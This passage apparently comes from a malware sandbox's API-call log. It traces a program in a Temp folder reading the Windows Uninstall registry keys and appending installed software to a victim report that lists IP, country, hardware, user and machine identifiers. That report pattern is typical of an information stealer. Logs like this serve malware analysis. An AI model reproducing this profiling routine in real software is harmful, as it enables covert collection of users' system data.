14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n" [0175.882] RegCloseKey (hKey=0x354) returned 0x0 [0175.882] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x1c, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.882] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}") returned 90 [0175.882] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.883] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x197fd4*=0x2a) returned 0x0 [0175.883] lstrlenA (lpString="Microsoft Visual C++ 2005 Redistributable") returned 41 [0175.883] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n", lpString2="Microsoft Visual C++ 2005 Redistributable" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable" [0175.883] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="8.0.61001", lpcbData=0x197fd4*=0xa) returned 0x0 [0175.883] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable " [0175.883] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable ", lpString2="8.0.61001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001" [0175.883] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n" [0175.883] RegCloseKey (hKey=0x354) returned 0x0 [0175.883] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x1d, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0011-0000-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.884] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0011-0000-0000-0000000FF1CE}") returned 90 [0175.884] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0011-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.884] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office Professional Plus 2016", lpcbData=0x197fd4*=0x28) returned 0x0 [0175.884] lstrlenA (lpString="Microsoft Office Professional Plus 2016") returned 39 [0175.884] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n", lpString2="Microsoft Office Professional Plus 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016" [0175.884] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.884] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 